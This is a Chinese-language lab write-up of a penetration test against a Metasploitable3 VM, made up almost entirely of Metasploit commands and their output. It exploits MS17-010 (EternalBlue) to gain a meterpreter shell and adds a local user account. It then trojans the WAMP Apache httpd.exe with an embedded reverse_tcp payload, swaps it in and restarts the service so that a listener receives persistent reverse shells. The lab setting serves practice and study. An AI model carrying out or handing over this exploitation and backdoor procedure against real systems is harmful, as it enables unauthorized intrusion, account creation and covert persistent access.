MSTables3靶机渗透测试（3）- MS17-010永恒之蓝

• 配置防火墙将相应的“阻塞端口安全策略”-- Disabled

• 查看全部关于ms17-010模块

msf6 > search ms17-010

• 对目标进行扫描

msf6 auxiliary(admin/smb/ms17_010_command) > use auxiliary/admin/smb/ms17_010_command
msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.118.4
rhosts => 192.168.118.4
msf6 auxiliary(admin/smb/ms17_010_command) > show options

扫描完成

msf6 auxiliary(admin/smb/ms17_010_command) > run

• 再尝试另一个扫描模块

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.118.4
rhosts => 192.168.118.4
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

• 对目标主机实施攻击

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.118.4
rhosts => 192.168.118.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

成功。

• 截屏

meterpreter > screenshot
Screenshot saved to: /root/BRSzCHir.jpeg

• 创建一个用户

meterpreter > shell
Process 3656 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\Windows\system32>net user zzq 7076 /add
net user zzq 7076 /add
The command completed successfully.

• 留后门

meterpreter > ps -S httpd.exe
Filtering on 'httpd.exe'

Process List
============

 PID   PPID  Name       Arch  Session  User                        Path
 ---   ----  ----       ----  -------  ----                        ----
 2336  480   httpd.exe  x64   0        NT AUTHORITY\LOCAL SERVICE  
 2944  2336  httpd.exe  x64   0        NT AUTHORITY\LOCAL SERVICE  C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe

meterpreter > kill 2944
Killing: 2944
meterpreter > download c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe 
[*] Downloading: c:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
[*] Downloaded 21.00 KiB of 21.00 KiB (100.0%): c:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
[*] download   : c:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe

先杀死进程，再将其下载，然后把会话退到后台。

• 制作后门文件

msf6 exploit(windows/smb/ms17_010_eternalblue) > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 192.168.118.1
lhost => 192.168.118.1
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -p Windows -x /root/httpd.exe -k -f exe -o /root/httpd-door.exe
[*] Writing 29184 bytes to /root/httpd-door.exe...

• 启动一个监听，监听后门的反向连接，并使用 expolit-j 放到后台。

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp‘
msf6 exploit(multi/handler) > set lhost 192.168.118.1
lhost => 192.168.118.1
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.118.1:4444

• 切回之前的 meterpreter session，上传后门文件并重命名。

meterpreter > cd c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\
meterpreter > pwd
c:\wamp\bin\apache\apache2.2.21\bin
meterpreter > mv httpd.exe httpd.exe.bak
meterpreter > upload /root/httpd-door.exe
[*] uploading  : /root/httpd-door.exe -> httpd-door.exe
[*] Uploaded 28.50 KiB of 28.50 KiB (100.0%): /root/httpd-door.exe -> httpd-door.exe
[*] uploaded   : /root/httpd-door.exe -> httpd-door.exe
meterpreter > mv httpd-door.exe httpd.exe

• 重启 wampapache 服务。

meterpreter > shell
Process 1532 created.
Channel 3 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\wamp\bin\apache\apache2.2.21\bin>net stop wampapache 
net stop wampapache
The wampapache service is stopping.
The wampapache service was stopped successfully.


c:\wamp\bin\apache\apache2.2.21\bin>net start wampapache

[*] Sending stage (200262 bytes) to 192.168.118.4
net start wampapache
The wampapache service is starting.
The wampapache service was started successfully.


c:\wamp\bin\apache\apache2.2.21\bin>[*] Meterpreter session 9 opened (192.168.118.1:4444 -> 192.168.118.4:49402) at 2021-02-26 23:31:39 +0800
[*] Sending stage (200262 bytes) to 192.168.118.4

服务启动后，返回了新的会话。

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.118.4 - Meterpreter session 8 closed.  Reason: User exit
msf6 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                                   Connection
  --  ----  ----                     -----------                                   ----------
  9         meterpreter x64/windows  NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3  192.168.118.1:4444 -> 192.168.118.4:49402 (192.168.118.4)
  msf6 exploit(multi/handler) > sessions 9
[*] Starting interaction with 9...

• 再留个后门

exploit/multi/handler 保持监听状态，每当对端的“httpd.exe”
重启，这边就会启动会话。

msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.118.1:4444 
[*] Sending stage (200262 bytes) to 192.168.118.4
[*] Meterpreter session 12 opened (192.168.118.1:4444 -> 192.168.118.4:49327) at 2021-02-26 23:45:18 +0800

meterpreter > shell
Process 3668 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\wamp\bin\apache\Apache2.2.21>dir